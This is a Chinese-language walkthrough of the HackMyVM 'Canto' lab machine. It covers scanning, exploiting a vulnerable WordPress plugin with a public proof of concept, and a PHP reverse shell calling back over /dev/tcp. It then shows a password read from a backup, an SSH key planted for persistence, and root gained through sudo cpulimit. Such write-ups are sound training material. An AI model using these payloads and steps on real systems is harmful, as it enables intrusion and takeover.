当前位置: 首页 > news >正文

Canto - hackmyvm

简介

靶机名称:Canto

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Canto

本地环境

虚拟机:vitual box

靶场IP(Canto):192.168.130.53

windows_IP:192.168.130.158

kali_IP:192.168.130.166

扫描

nmap起手

nmap -sT -p0- 192.168.130.53 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.130.53/32 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 05:55 EDT
Nmap scan report for canto.lan (192.168.130.53)
Host is up (0.00084s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
|_  256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Ubuntu))
|_http-generator: WordPress 6.5.3
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-title: Canto
MAC Address: 08:00:27:73:D7:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

HTTP

框架是wordpress,直接wpscan先试试

wpscan --url http://192.168.130.53/ --plugins-detection aggressive -e u,ap --api-token=Vjt...
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.130.53/ [192.168.130.53]
[+] Started: Thu Aug  1 09:23:25 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.57 (Ubuntu)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.130.53/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.130.53/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.130.53/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.130.53/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299Fingerprinting the version - Time: 00:00:02 <==========> (702 / 702) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.[+] WordPress theme in use: twentytwentyfour| Location: http://192.168.130.53/wp-content/themes/twentytwentyfour/| Last Updated: 2024-07-16T00:00:00.000Z| Readme: http://192.168.130.53/wp-content/themes/twentytwentyfour/readme.txt| [!] The version is out of date, the latest version is 1.2| [!] Directory listing is enabled| Style URL: http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css| Style Name: Twenty Twenty-Four| Style URI: https://wordpress.org/themes/twentytwentyfour/| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...| Author: the WordPress team| Author URI: https://wordpress.org|| Found By: Urls In Homepage (Passive Detection)|| Version: 1.1 (80% confidence)| Found By: Style (Passive Detection)|  - http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'[+] Enumerating All Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:01:04 <=====> (106191 / 106191) 100.00% Time: 00:01:04
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] akismet| Location: http://192.168.130.53/wp-content/plugins/akismet/| Last Updated: 2024-07-10T22:16:00.000Z| Readme: http://192.168.130.53/wp-content/plugins/akismet/readme.txt| [!] The version is out of date, the latest version is 5.3.3|| Found By: Known Locations (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/akismet/, status: 200|| Version: 5.3.2 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt[+] canto| Location: http://192.168.130.53/wp-content/plugins/canto/| Last Updated: 2024-07-17T04:18:00.000Z| Readme: http://192.168.130.53/wp-content/plugins/canto/readme.txt| [!] The version is out of date, the latest version is 3.0.9|| Found By: Known Locations (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/canto/, status: 200|| [!] 4 vulnerabilities identified:|| [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF|     References:|      - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063|      - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0|| [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion|     Fixed in: 3.0.5|     References:|      - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452|| [!] Title: Canto < 3.0.7 - Unauthenticated RCE|     Fixed in: 3.0.7|     References:|      - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096|      - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability|| [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion|     Fixed in: 3.0.9|     References:|      - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936|      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338|| Version: 3.0.4 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/canto/readme.txt| Confirmed By: Composer File (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/canto/package.json, Match: '3.0.4'[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <=============> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] erik| Found By: Rss Generator (Passive Detection)| Confirmed By:|  Wp Json Api (Aggressive Detection)|   - http://192.168.130.53/index.php/wp-json/wp/v2/users/?per_page=100&page=1|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] WPScan DB API OK| Plan: free| Requests Done (during the scan): 3| Requests Remaining: 21

可以看到canto插件有漏洞,searchsplolit找一下

image-20240801204116194

那就没什么好说的了,直接打poc

CVE-2023-3452

https://github.com/leoanggal1/CVE-2023-3452-PoC

先准备一个反弹shell的php文件

<?php system("bash -c 'sh -i >& /dev/tcp/192.168.130.166/40000 0>&1'");?> 

然后起个监听

 rlwrap -cAr nc -lvvp 40000

最后poc打过去就好了

python3 CVE-2023-3452.py -u http://192.168.130.53 -LHOST 192.168.130.166  -s ./shell.php

image-20240801205141227

提权

备份

/var/wordpress/backups路径下找到账密备份文件

image-20240801205423946

www-data@canto:/var/wordpress/backups$ su erik
su erik
Password: th1sIsTheP3ssw0rd!erik@canto:/var/wordpress/backups$ cd
cd
erik@canto:~$ ls
ls
notes  user.txt
erik@canto:~$ id
id
uid=1001(erik) gid=1001(erik) groups=1001(erik)

提权成功,拿到user.txt

顺手把公钥传上去维权

erik@canto:~$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
...
erik@canto:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" > authorized_keys

sudo提权

sudo -l查看权限

erik@canto:/$ sudo -l
Matching Defaults entries for erik on canto:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,use_ptyUser erik may run the following commands on canto:(ALL : ALL) NOPASSWD: /usr/bin/cpulimit

GTFOBINS有一键提权方案

image-20240801210131374

erik@canto:/$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 3024 detected
root@canto:/# cd
root@canto:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:~# ls
root.txt  snap

结束

相关文章:

Canto - hackmyvm

简介 靶机名称&#xff1a;Canto 难度&#xff1a;简单 靶场地址&#xff1a;https://hackmyvm.eu/machines/machine.php?vmCanto 本地环境 虚拟机&#xff1a;vitual box 靶场IP&#xff08;Canto&#xff09;&#xff1a;192.168.130.53 windows_IP&#xff1a;192.1…...

【数据结构进阶】手撕红黑树

&#x1f525;个人主页&#xff1a; Forcible Bug Maker &#x1f525;专栏&#xff1a; C || 数据结构 目录 &#x1f308;前言&#x1f525;红黑树的概念&#x1f525;手撕红黑树红黑树结点的定义红黑树主体需要实现的成员函数红黑树的插入findEmpty和Size拷贝构造析构函数和…...

【C++从小白到大牛】类和对象

目录 一、面向过程和面向对象初步认识 二、类的引入 三、类的定义 类的成员函数两种定义方式&#xff1a; 1. 声明和定义全部放在类体中 2. 类声明放在.h文件中&#xff0c;成员函数定义放在.cpp文件中 成员变量命名规则的建议&#xff1a; 四、类的访问限定符 【访问限…...

Kafka 为什么这么快的七大秘诀,涨知识了

我们都知道 Kafka 是基于磁盘进行存储的&#xff0c;但 Kafka 官方又称其具有高性能、高吞吐、低延时的特点&#xff0c;其吞吐量动辄几十上百万。 在座的靓仔和靓女们是不是有点困惑了&#xff0c;一般认为在磁盘上读写数据是会降低性能的&#xff0c;因为寻址会比较消耗时间。…...

一文解决3D车道线检测:最新单目3D车道线检测综述

前言 场景理解是自动驾驶中极具挑战的任务&#xff0c;尤其是车道检测。车道是道路分割的关键&#xff0c;对车辆安全高效行驶至关重要。车道检测技术能自动识别道路标记&#xff0c;对自动驾驶车辆至关重要&#xff0c;缺乏这项技术可能导致交通问题和事故。车道检测面临多种…...

稳中向好,今年新招6000人

团子校招 近日&#xff0c;美团宣布开启面向 2025 届的校园招聘&#xff0c;招聘规模达 6000 人。 虽然相比京东&#xff08;宣布招聘 16000 人&#xff09;稍有逊色&#xff0c;但 6000 这个校招规模可一点不少。 要知道&#xff0c;京东是重自营的传统电商&#xff0c;16000 …...

使用kettle开源工具进行跨库数据同步

数据库同步可以用&#xff1a; 1、Navicat 2、Kettle 3、自己写代码 调用码神工具跨库数据同步 -连接 4、其它 实现 这里使用Kettle来同步&#xff0c;主要是开源的&#xff0c;通过配置就可以实现了 Kettle的图形化界面&#xff08;Spoon&#xff09;安装参考方法 ht…...

Golang | Leetcode Golang题解之第307题区域和检索-数组可修改

题目&#xff1a; 题解&#xff1a; type NumArray struct {nums, tree []int }func Constructor(nums []int) NumArray {tree : make([]int, len(nums)1)na : NumArray{nums, tree}for i, num : range nums {na.add(i1, num)}return na }func (na *NumArray) add(index, val …...

Golang | Leetcode Golang题解之第301题删除无效的括号

题目&#xff1a; 题解&#xff1a; func checkValid(str string, lmask, rmask int, left, right []int) bool {cnt : 0pos1, pos2 : 0, 0for i : range str {if pos1 < len(left) && i left[pos1] {if lmask>>pos1&1 0 {cnt}pos1} else if pos2 <…...

【Story】《程序员面试的“八股文”辩论:技术基础与实际能力的博弈》

目录 程序员面试中的“八股文”&#xff1a;助力还是阻力&#xff1f;1. “八股文”的背景与定义1.1 “八股文”的起源1.2 “八股文”的常见类型 2. “八股文”的作用分析2.1 理论基础的评价2.1.1 助力2.1.2 阻力 3. 实际工作能力的考察3.1 助力3.2 阻力 4. 面试中的背题能力4.…...

初步了解泛型

目录 泛型的引入 泛型 泛型 泛型类 泛型的上界 泛型的引入 之前学习的数组里面是存放着整型或者自字符串中一种的数组&#xff0c;如果想要在一个数组里面放多种类型数据&#xff0c;我们该怎么去做呢&#xff1f;Object类或许是一个好的解决方法&#xff0c;因为Object类…...

【C#】.net core 6.0 webapi 使用core版本的NPOI的Excel读取数据以及保存数据

欢迎来到《小5讲堂》 这是《C#》系列文章&#xff0c;每篇文章将以博主理解的角度展开讲解。 温馨提示&#xff1a;博主能力有限&#xff0c;理解水平有限&#xff0c;若有不对之处望指正&#xff01; 目录 背景读取并保存NPOI信息NPOI 插件介绍基本功能示例代码写入 Excel 文件…...

C++推荐的oj网站

洛谷 信息学奥赛一本通 C语言网 codeforces 杭电oj...

springmvc处理http请求的底层逻辑

http-nio-8088-Poller线程中在org.apache.tomcat.util.net.NioEndpoint.Poller#run这个函数里循环检测selector&#xff0c;若发现有SocketEvent.OPEN_READ事件则会将SelectionKey.attachment中的内容作为入参包装成runable&#xff0c;然后由org.apache.tomcat.util.threads.T…...

干货满满,从零到一:编程小白如何在大学成为编程大神?

✨✨ 欢迎大家来访Srlua的博文&#xff08;づ&#xffe3;3&#xffe3;&#xff09;づ╭❤&#xff5e;✨✨ &#x1f31f;&#x1f31f; 欢迎各位亲爱的读者&#xff0c;感谢你们抽出宝贵的时间来阅读我的文章。 我是Srlua小谢&#xff0c;在这里我会分享我的知识和经验。&am…...

前端-如何通过docker打包Vue服务成镜像并在本地运行(本地可以通过http://localhost:8080/访问前端服务)

1、下载安装docker&#xff0c;最好在vs code里安装docker的插件。 下载链接&#xff1a;https://www.docker.com/products/docker-desktop &#x1f389; Docker 简介和安装 - Docker 快速入门 - 易文档 (easydoc.net) 2、准备配置文件-dockerfile文件和nginx.conf文件 do…...

零基础学习【Mybatis】这一篇就够了

Mybatis 查询resultType使用resultMap使用单条件查询多条件查询模糊查询返回主键 动态SQLifchoosesetforeachsql片段 配置文件注解增删改查结果映射 查询 resultType使用 当数据库返回的结果集中的字段和实体类中的属性名一一对应时, resultType可以自动将结果封装到实体中 r…...

Shell入门(保姆级教学)

Shell是一种命令行解释器&#xff0c;也是一种脚本语言&#xff0c;广泛应用于Unix和类Unix系统中&#xff0c;例如Linux。它是用户与操作系统内核交互的桥梁&#xff0c;通过Shell可以执行系统命令、管理文件系统、处理文本数据等。本文将带你入门Shell编程&#xff0c;涵盖基…...

【JDK11和JDK8并行与切换】

一、JDK11安装 1、下载jdk11&#xff0c;点击.exe安装在&#xff1a;C:\Program Files\Java\jdk-11\ 2、配置JAVA_HOME 变量名为JAVA_HOME 变量值为jdk安装路径 3、配置PATH 找到系统变量里的PATH 双击或者单击后点击编辑 点击右上角的新建 新建两条 %JAVA_HOME%\bin …...

vue大数据量列表渲染性能优化:虚拟滚动原理

前面咱完成了自定义JuanTree组件各种功能的实现。在数据量很大的情况下&#xff0c;我们讲了两种实现方式来提高渲染性能&#xff1a;前端分页和节点数据懒加载。 前端分页小节&#xff1a;Vue3扁平化Tree组件的前端分页实现 节点数据懒加载小节&#xff1a;Element Tree Plu…...

昇思25天学习打卡营第1天|快速入门

目录 昇思MindSpore介绍MindSpore的API来快速实现一个简单的深度学习模型通过资料更深入的了解昇思MindSpore 昇思MindSpore介绍 今天有幸学习了昇思MindSpore&#xff0c;让我们来简单的了解一下它 昇思MindSpore是一个全场景深度学习框架&#xff0c;旨在实现易开发、高效执行…...

LinkedList 实现 LRU 缓存

LRU&#xff08;Least Recently Used&#xff0c;最近最少使用&#xff09;缓存是一种缓存淘汰策略&#xff0c;用于在缓存满时淘汰最久未使用的元素。 关键&#xff1a; 缓存选什么结构&#xff1f; 怎么实现访问顺序&#xff1f; import java.util.*;public class LRUCac…...

ubuntu安装workon

pip install virtualenvpip install virtualenvwrapper配置virtualenvwrapper。在你的shell配置文件&#xff08;比如.bashrc&#xff0c;.bash_profile或.zshrc&#xff09;中添加以下内容&#xff1a;export WORKON_HOME$HOME/.virtualenvs export VIRTUALENVWRAPPER_PYTHON/…...

(面试必看!)锁策略

文章导读 引言考点一、重量级锁 VS 轻量级锁1、定义与原理2、主要区别3、适用场景 考点二、乐观锁 VS 悲观锁1、悲观锁&#xff08;Pessimistic Locking&#xff09;2、乐观锁&#xff08;Optimistic Locking&#xff09;3、总结 考点三、读写锁1、读写锁的特性2、读写锁的实现…...

RAGflow:开源AI框架的创新与应用

在当今科技飞速发展的时代&#xff0c;人工智能&#xff08;AI&#xff09;已经成为各行各业不可或缺的一部分。特别是在文档处理和数据分析领域&#xff0c;AI的应用更是无处不在。今天&#xff0c;我要向大家介绍一个开源的AI框架引擎——RAGflow。它能够在深度文档理解方面执…...

AI的学习明确路径

1.不要一开始学习数学。 首先&#xff0c;学习python的语法和工具包。 python的工具包有&#xff1a;numpy,pandas,matlap,sciklt-learn. 然后&#xff0c;学习机械学习算法&#xff0c;学习1.树模型&#xff0c;随机森林 。 2.神经网络。 上kaggle中&#xff0c;找人家的经…...

【C++】巧用缺省参数与函数重载:提升编程效率的秘密武器

C语法相关知识点可以通过点击以下链接进行学习一起加油&#xff01;命名空间 本章将分享缺省参数与函数重载相关知识&#xff0c;为了更加深入学习C打下了坚实的基础。本章重点在于缺省参数与函数重载使用前提与注意事项 &#x1f308;个人主页&#xff1a;是店小二呀 &#x1…...

mysql排查死锁的几个查询sql

SHOW PROCESSLIST; select * from information_schema.INNODB_TRX; select * from information_schema.INNODB_LOCKS; select * from information_schema.INNODB_LOCK_WAITS;...

快速部署私有化大模型 毕昇(使用docker-compose方式)

docker安装 1. # Linux系统安装docker&#xff0c;以CentOS/RHEL为例&#xff0c;其他操作系统请参考docker官方安装方法 # 如果已经安装过docker 期望重装&#xff0c;先卸载 sudo yum remove docker \docker-client \docker-client-latest \docker-common \docker-latest \d…...

B端:导航条就框架提供的默认样式吗?非也,看过来。

导航条不一定必须使用框架提供的默认样式&#xff0c;你可以根据项目需求和设计风格进行自定义。通过使用框架提供的自定义选项、CSS样式覆盖、自行设计或者使用其他UI库或组件&#xff0c;你可以实现独特且符合需求的导航条样式。 下面发一些参考给友友们&#xff0c;可以让设…...